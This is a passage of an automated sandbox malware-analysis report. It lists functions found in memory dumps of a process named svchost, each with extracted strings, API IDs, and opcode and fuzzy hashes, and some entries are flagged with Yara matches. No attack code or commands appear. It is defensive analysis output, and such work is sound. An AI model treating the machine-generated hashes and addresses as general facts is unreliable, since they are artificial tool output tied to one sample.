                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                      • API String ID: 0-931879808
                                                                                                                      • Opcode ID: 1fcc455bc4984beed2ce35872f912f8534e81921512ba0d324b58b64fbc27e42
                                                                                                                      • Instruction ID: 32682f8f48e319ace2931360d475f0d7341154e4bd86964c506dc9665d19e8c7
                                                                                                                      • Opcode Fuzzy Hash: 1fcc455bc4984beed2ce35872f912f8534e81921512ba0d324b58b64fbc27e42
                                                                                                                      • Instruction Fuzzy Hash: 8431263AE10200AFEB20DF59CCC5F7AB6BCEB51764F448199E805BF184E7B0AD048794
                                                                                                                      Function 03371270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0337127B
                                                                                                                      • BuildLabEx, xrefs: 0337130F
                                                                                                                      • @, xrefs: 033712A5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                      • API String ID: 0-3051831665
                                                                                                                      • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                      • Instruction ID: e4ebc92e1f70fc29c56d0cc343359e03109f378a30806b1dcca28b855eaff958
                                                                                                                      • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                      • Instruction Fuzzy Hash: BE317E76D00618ABDB21EB95CC84EEEBBBDEB84650F004465E914AB160D734DA05DB50
                                                                                                                      Function 033B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpInitializationFailure, xrefs: 033B20FA
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 033B2104
                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 033B20F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2986994758
                                                                                                                      • Opcode ID: ce59161c71bdf093572d804cd2238a70ee47f7c685a84f1230b300b7d63a1cfd
                                                                                                                      • Instruction ID: df06b9e9ba62c8ec1873588c8ebc4db631cbde220fb9e4ca9caffa8a54e82fd2
                                                                                                                      • Opcode Fuzzy Hash: ce59161c71bdf093572d804cd2238a70ee47f7c685a84f1230b300b7d63a1cfd
                                                                                                                      • Instruction Fuzzy Hash: D3F0A439A40308AFD624EA4C9C82FDA77B8EB40A54F540455F740BB685D2A0A5108A91
                                                                                                                      Function 033403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: #%u
                                                                                                                      • API String ID: 48624451-232158463
                                                                                                                      • Opcode ID: 943e2b257c4cb13245b6fcd4ed1321486f40586d9496aaa9f5fdb4fdef64385d
                                                                                                                      • Instruction ID: 0ab7de56a71404dfc8ee8201115ae3117d3a4d11b3456f66762f73b88d244ca3
                                                                                                                      • Opcode Fuzzy Hash: 943e2b257c4cb13245b6fcd4ed1321486f40586d9496aaa9f5fdb4fdef64385d
                                                                                                                      • Instruction Fuzzy Hash: 7C714775E0024ADFDB05DFA9D990BAEB7F8EF08704F154065E905AB251EB38ED41CBA0
                                                                                                                      Function 033D705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                      • String ID: kLsE
                                                                                                                      • API String ID: 3446177414-3058123920
                                                                                                                      • Opcode ID: ade830367651d20587c87a02ff2c11c9a06495087abce9ddef36930b0bbad907
                                                                                                                      • Instruction ID: a1fd84645a5ea26ba5cdcf15bb8819fd18502e2b3f2b613737ca5a1fb6bdfadb
                                                                                                                      • Opcode Fuzzy Hash: ade830367651d20587c87a02ff2c11c9a06495087abce9ddef36930b0bbad907
                                                                                                                      • Instruction Fuzzy Hash: 7C4156769013514AE731FF65FCC4B697BE4EB50B24F990229EC60BE1C9CBB85481CBA0
                                                                                                                      Function 033452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@
                                                                                                                      • API String ID: 0-149943524
                                                                                                                      • Opcode ID: 9e495171fde41a9c5ada1c23e9a4a1101f340c6f7f709bf0c9f4185b2d9fd8a6
                                                                                                                      • Instruction ID: d011dc1faf38ff029f466651627fa5ecfc9f19ae6db306918c48c521c4d6e7c8
                                                                                                                      • Opcode Fuzzy Hash: 9e495171fde41a9c5ada1c23e9a4a1101f340c6f7f709bf0c9f4185b2d9fd8a6
                                                                                                                      • Instruction Fuzzy Hash: CF328C75A083118BEB24CF19C9C073EB7E5EF86750F18492EF9959B2A0E734E844CB52
                                                                                                                      Function 033FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-197956300
                                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction ID: 95a905722c411c86092c4e2aec0a25a8ec74cb7413e77479615ceeb0348fbb40
                                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction Fuzzy Hash: 14C1BD312043429FDB24CF28C881B6BFBE5AF84358F484A2DF699CA290D775E549CF91
                                                                                                                      Function 03330CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Failed to retrieve service checksum., xrefs: 0338EE56
                                                                                                                      • ResIdCount less than 2., xrefs: 0338EEC9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                      • API String ID: 0-863616075
                                                                                                                      • Opcode ID: 27b823a58d0d5372258f85bc3b2804e6dc9ce957978f75dde84a7029ed8c9302
                                                                                                                      • Instruction ID: 5ca5a7d0690eba22dc83e01b42adf5787a6db8a50c939483d55d30bd526db932
                                                                                                                      • Opcode Fuzzy Hash: 27b823a58d0d5372258f85bc3b2804e6dc9ce957978f75dde84a7029ed8c9302
                                                                                                                      • Instruction Fuzzy Hash: 93E1F2B59087849FE324CF15C480BABFBE4FF88314F408A2EE5999B290DB749549CF56
                                                                                                                      Function 00402500 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G*$gfff
                                                                                                                      • API String ID: 0-4083895161
                                                                                                                      • Opcode ID: d0d0b24b92919a41424604ef1a06faf5c5e15a5dc9223fdf503d73317ce995d3
                                                                                                                      • Instruction ID: 8be1c9363f133b5d6d46f1aaeb320877a38c1a7d87a5461888ddea10cf01c740
                                                                                                                      • Opcode Fuzzy Hash: d0d0b24b92919a41424604ef1a06faf5c5e15a5dc9223fdf503d73317ce995d3
                                                                                                                      • Instruction Fuzzy Hash: CD413532B0011A17CB2C481D9E682BB624797E4315B5C8677ED89AF3C5F8BEAD4252CD
                                                                                                                      Function 033AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                      • Opcode ID: feeef70cf39be499322ba9aa8bcbf32b52bf7474198c26d2f00a870a21f5510c
                                                                                                                      • Instruction ID: a4f871cc410beadc3f08ed2cfc24e9a6d50f1bba175becd3ac388f0fe066e05e
                                                                                                                      • Opcode Fuzzy Hash: feeef70cf39be499322ba9aa8bcbf32b52bf7474198c26d2f00a870a21f5510c
                                                                                                                      • Instruction Fuzzy Hash: 99614B76E00B189FDB24DFACC8C0BAEBBB9FB44701F144169E559EB291D735A940CB50
                                                                                                                      Function 004024FC Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G*$gfff
                                                                                                                      • API String ID: 0-4083895161
                                                                                                                      • Opcode ID: 0849d612707f88557dc76491b148e4c1bf6c160eb9b60e3a832cc4b9abc0f1ce
                                                                                                                      • Instruction ID: 94ac54f95b860aef2f850775c6bde38ba30668375b31edb6e73567122a982fb7
                                                                                                                      • Opcode Fuzzy Hash: 0849d612707f88557dc76491b148e4c1bf6c160eb9b60e3a832cc4b9abc0f1ce
                                                                                                                      • Instruction Fuzzy Hash: 22413332F0011A53CB2C480D8F682AB621793E4314B5D8677ED49AF3D1F4BAAD0242CD
                                                                                                                      Function 0334F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$
                                                                                                                      • API String ID: 0-233714265
                                                                                                                      • Opcode ID: 5440ecd39d5d8c96302e4198dcbc6f3611e5b4aff436b409c3c9a1eea1a8e529
                                                                                                                      • Instruction ID: 8f45f4a5eef3fe578d0f332126a6d32db563038763af912f693cc005584feee0
                                                                                                                      • Opcode Fuzzy Hash: 5440ecd39d5d8c96302e4198dcbc6f3611e5b4aff436b409c3c9a1eea1a8e529
                                                                                                                      • Instruction Fuzzy Hash: EA616575E00749DFDB20EFA4C9C0BA9BBF5BB48704F18446AE515AF680DB74B941CB90
                                                                                                                      Function 0333A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0333A2FB
                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0333A309
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                      • API String ID: 0-2876891731
                                                                                                                      • Opcode ID: bc5d897a59861c6e0f8558063470979f461b7f83b8fc16cec9ad1a226f755717
                                                                                                                      • Instruction ID: aa0ef482c5c324733777d5f8efbecaaab7411be9be698a6cf4a8693d896d55cc
                                                                                                                      • Opcode Fuzzy Hash: bc5d897a59861c6e0f8558063470979f461b7f83b8fc16cec9ad1a226f755717
                                                                                                                      • Instruction Fuzzy Hash: 38419F35A04A49DBDB15CF69C8C0B6AB7F8FF86720F1884A6EC44DB691E335D940CB51
                                                                                                                      Function 0336329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local\$@
                                                                                                                      • API String ID: 0-380025441
                                                                                                                      • Opcode ID: 88860e8120e65a7789f9a8a1c0af53ebc3bf87415f13d1b79d618886cbaf2ece
                                                                                                                      • Instruction ID: 191a241a8d2552db901ddac48f95596c01925b6eeec36dce7452722445189a6a
                                                                                                                      • Opcode Fuzzy Hash: 88860e8120e65a7789f9a8a1c0af53ebc3bf87415f13d1b79d618886cbaf2ece
                                                                                                                      • Instruction Fuzzy Hash: 9D31A17A509304AFC321DF28C8C0A5BBBE8EFC5664F58492EF99587260DA34DD04CB92
                                                                                                                      Function 0333C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: MUI
                                                                                                                      • API String ID: 0-1339004836
                                                                                                                      • Opcode ID: 1d902b8be38a38529e8dac13c86ab09c81135ddd6fc174b2f02e0d747e1fd6a7
                                                                                                                      • Instruction ID: e0349a842cabca077aa37dbeb80a253f5d549defe220993f32fb17298f85feda
                                                                                                                      • Opcode Fuzzy Hash: 1d902b8be38a38529e8dac13c86ab09c81135ddd6fc174b2f02e0d747e1fd6a7
                                                                                                                      • Instruction Fuzzy Hash: E7822875E002189BDB24CFA9C8C0BEDF7B5BF4A710F18C169E859AB654DB349D81CB50
                                                                                                                      Function 03382F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: P`vRbv
                                                                                                                      • API String ID: 0-2392986850
                                                                                                                      • Opcode ID: d4030a7c3823ea5567dc5c5ad90c316f1fd5ba77c20cfab832f7ab894efbbeb0
                                                                                                                      • Instruction ID: d003fe58b67988cef7797f70466e39383b0cc3222287e92e86cfa2a965c78776
                                                                                                                      • Opcode Fuzzy Hash: d4030a7c3823ea5567dc5c5ad90c316f1fd5ba77c20cfab832f7ab894efbbeb0
                                                                                                                      • Instruction Fuzzy Hash: 5642B17DD04359AADF29FF68D8C46BDFBB5AF05B20F18805AE441AB390D7748A81CB50
                                                                                                                      Function 03337370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 12987e518a33715516db0a1dfab212feb9d9c58ca425b47685dfb46ba7422288
                                                                                                                      • Instruction ID: 8ee026e36cc5fea4a691f500d8d00aabd45e91d4343808dfe09167d18ff513e8
                                                                                                                      • Opcode Fuzzy Hash: 12987e518a33715516db0a1dfab212feb9d9c58ca425b47685dfb46ba7422288
                                                                                                                      • Instruction Fuzzy Hash: 5BA17FB5A08342CFD724DF28C4C0A2ABBE9FF89314F14896EE5859B350D734E945CB92
                                                                                                                      Function 03352E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 0-4108050209
                                                                                                                      • Opcode ID: 0f046019b75751a054fb44357309c4d3c3aa120b5da24bcd0d29441b9815da9e
                                                                                                                      • Instruction ID: dd8e2c7b757a9c86eacef3ef03e850d41666d8aacb06862d8bfac907086f296a
                                                                                                                      • Opcode Fuzzy Hash: 0f046019b75751a054fb44357309c4d3c3aa120b5da24bcd0d29441b9815da9e
                                                                                                                      • Instruction Fuzzy Hash: 12F18E79608745CFDB25CF24C8C0F6ABBE5AF88660F09496DFC8A8B740DB34D9458B52
                                                                                                                      Function 004166D3 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      • Opcode ID: c0f2bc45f6371baec8a1f9795520e753189af95658f373a00a026f7f0275d273
                                                                                                                      • Instruction ID: 76ac8794f09649599ae5d97b305873b7bc78380a659a0961575410bfa6486660
                                                                                                                      • Opcode Fuzzy Hash: c0f2bc45f6371baec8a1f9795520e753189af95658f373a00a026f7f0275d273
                                                                                                                      • Instruction Fuzzy Hash: 4D021EB6E006199FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                                                                                                      Function 03332FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PATH
                                                                                                                      • API String ID: 0-1036084923
                                                                                                                      • Opcode ID: cf043a8f777bec2f822065fc0c85af09041a5b2dbbec65c6e768286ff8ca4f12
                                                                                                                      • Instruction ID: 82d9118a3c459079f55b1ed29ee9321f36944ec75ca2b9291c57c5969a61c8eb
                                                                                                                      • Opcode Fuzzy Hash: cf043a8f777bec2f822065fc0c85af09041a5b2dbbec65c6e768286ff8ca4f12
                                                                                                                      • Instruction Fuzzy Hash: 4AF19D79D002189BCB25DF99D8C1ABEBBF5FF4A720F59C029E841BB250D774A841CB61
                                                                                                                      Function 0336F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 90bcf00f7316056bad4aefa0636432ac5aa9efcc6770a3da1f7e00cdd5143c62
                                                                                                                      • Instruction ID: b3ef16e97f28d566eaded5955def410df1a1c3d981aa92a88692dc05444e477e
                                                                                                                      • Opcode Fuzzy Hash: 90bcf00f7316056bad4aefa0636432ac5aa9efcc6770a3da1f7e00cdd5143c62
                                                                                                                      • Instruction Fuzzy Hash: CD414974D01288EFDB20DFA9D880AAEFBF4FB48300F54816EE859BB215D7749900CB64
                                                                                                                      Function 03330100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3916222277
                                                                                                                      • Opcode ID: 2a6fb86f581d3be63b198703b37425ab7784fc1e6ccc8a4bc03df192fdfbbe96
                                                                                                                      • Instruction ID: 08174fe98fdfb25fc70d1ae018337af5472d8889d6ccf84377bf64a22ecb160a
                                                                                                                      • Opcode Fuzzy Hash: 2a6fb86f581d3be63b198703b37425ab7784fc1e6ccc8a4bc03df192fdfbbe96
                                                                                                                      • Instruction Fuzzy Hash: A2A10C35E083685BDF2DDB298CC1BFEA7A95F46714F0880D9ED879B281C674C984CB51
                                                                                                                      Function 0336A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalTags
                                                                                                                      • API String ID: 0-1106856819
                                                                                                                      • Opcode ID: cdd405d9482de425458856305712eecd2a5023dc5605c0155e45135edcf3db44
                                                                                                                      • Instruction ID: 63adc55d0cefde93af902c859dec4e6be70312be9fda147dce3a4da1ecb5f513
                                                                                                                      • Opcode Fuzzy Hash: cdd405d9482de425458856305712eecd2a5023dc5605c0155e45135edcf3db44
                                                                                                                      • Instruction Fuzzy Hash: 18716D75E0061ACFDF28CF9CD9D1AADBBB9FF48701F18816AE806AB244D7359941CB50
                                                                                                                      Function 0333973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
                                                                                                                      • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                      • Instruction ID: 41f318eddc356e6ef31caefaec4c8cbd6611daf6627f91cae24b4eda55368db4
                                                                                                                      • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                      • Instruction Fuzzy Hash: 57618C75D01619EBDF21DF99C880BAEFBB8FF85711F14856AE810EB290D7749A01CB90
                                                                                                                      Function 033BF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
                                                                                                                      • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                      • Instruction ID: f67d7ce073ff5ec42f455bf9ad8dc0bebaf5e119e407f81aa975dfcb385129af
                                                                                                                      • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                      • Instruction Fuzzy Hash: CE516972A04705AFE721DB54CC80FABB7F8EB84750F040929BA809BA90D774ED148B91
                                                                                                                      Function 0334E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EXT-
                                                                                                                      • API String ID: 0-1948896318
                                                                                                                      • Opcode ID: 9f19a1d6d1462779f80822ca9c04cdcf2999cd96433c9ba2dd8231bec8c7db6e
                                                                                                                      • Instruction ID: 05254f8ac60c9f03576788b7ee8d325f28635a6f8b1149141dfc71fe0a54ebb2
                                                                                                                      • Opcode Fuzzy Hash: 9f19a1d6d1462779f80822ca9c04cdcf2999cd96433c9ba2dd8231bec8c7db6e
                                                                                                                      • Instruction Fuzzy Hash: 504150769093119BD720DB75C9C0B6BBBE8BF88724F444D2DF984DB180E774E9048796
                                                                                                                      Function 033EB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
